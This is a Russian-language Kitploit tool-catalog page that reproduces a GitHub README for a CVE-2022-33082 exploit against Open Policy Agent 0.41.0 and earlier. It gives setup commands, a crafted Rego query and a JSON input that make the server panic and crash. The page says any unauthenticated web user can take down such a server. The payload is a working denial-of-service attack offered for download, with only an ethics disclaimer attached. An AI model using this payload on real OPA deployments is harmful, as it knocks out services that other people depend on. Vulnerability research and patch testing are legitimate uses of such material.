Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-33082-exploit | Kitploit
Инструменты/GitHubGitHub/cyberqueenmeg/cve-2022-33082-exploit
Анализ уязвимостейЭксплуатацияВеб-безопасностьОбучение и Образование
GitHubcyberqueenmeg/cve-2022-33082-exploit

cve-2022-33082-exploit

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE 2022-33082 Эксплойт

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Этот код предоставлен для ЭТИЧЕСКИХ целей — понимания уязвимости и тестирования собственных систем или АВТОРИЗОВАННЫХ систем. Используя его, вы соглашаетесь действовать этично, и я не несу ответственности, если вы действуете неэтично.

Этот эксплойт работает на версиях Open Policy Agent (OPA) 0.41.0 и ниже. Установите экземпляр OPA на Linux для тестирования с помощью этой команды:

curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static

chmod +x opa

./opa run --server

Затем перейдите на localhost:8181 в вашем веб-браузере. Введите приведённое ниже в соответствующие поля

поле запроса (код Go): p := [input() | input := 1]

{ "input":"put this in the input (json) field!" }

После этого веб-сайт аварийно завершит работу, а терминал, запускающий сервер, сообщит о панике ядра

Последствия

Любой, у кого есть веб-доступ к серверу OPA версии 0.41.0 или ниже, может полностью вывести сервер из строя. Этот сервер по умолчанию не защищён паролем.

Скачать инструмент